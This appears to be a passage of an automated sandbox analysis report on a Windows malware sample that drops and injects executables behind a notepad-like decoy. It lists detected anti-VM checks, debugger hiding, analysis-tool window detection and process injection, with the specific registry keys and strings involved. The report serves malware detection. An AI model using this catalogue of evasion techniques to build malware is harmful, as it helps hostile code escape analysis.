Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.cs | High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/uNote.cs | High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/About.cs | High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/AramaFormu.cs | High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionOfElements.cs | High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/TextUtility.cs | High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form_Main.cs | High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/MainWindow.cs | High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | File created: C:\Users\user\AppData\Roaming\1234.exe
Source: C:\Users\user\AppData\Roaming\1234.exe | File created: C:\Users\user\AppData\Local\Temp\srvs.exe

                      Hooking and other Techniques for Hiding and Protection:

                      Uses known network protocols on non-standard ports
                      Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 32800
                      Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49751
                      Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 32800
                      Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49753
                      Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 32800
                      Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49754
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2BE0 IsIconic,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140040D29 IsZoomed,IsIconic,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,
                      Source: C:\Users\user\AppData\Roaming\1234.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 1234.exe PID: 4628, type: MEMORY
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | System information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Roaming\1234.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\1234.exe | Window / User API: threadDelayed 678
                      Source: C:\Users\user\AppData\Roaming\1234.exe | Window / User API: threadDelayed 8242
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Window / User API: threadDelayed 562
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Window / User API: threadDelayed 5387
                      Source: C:\Users\user\AppData\Roaming\1234.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Roaming\1234.exe TID: 6008 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\1234.exe TID: 1320 | Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe TID: 5404 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2390 FindFirstFileW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\1234.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeThread delayed: delay time: 922337203685477
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Nb2HQZZDIf.exeBinary or memory string: Hyper-V RAW
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeSystem information queried: ModuleInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,
Source: C:\Users\user\AppData\Roaming\1234.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\1234.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\1234.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\1234.exe | Memory written: C:\Users\user\AppData\Roaming\1234.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140062600 mouse_event,
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
Source: Nb2HQZZDIf.exe, srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: Nb2HQZZDIf.exe, srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
Source: srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Users\user\AppData\Roaming\1234.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
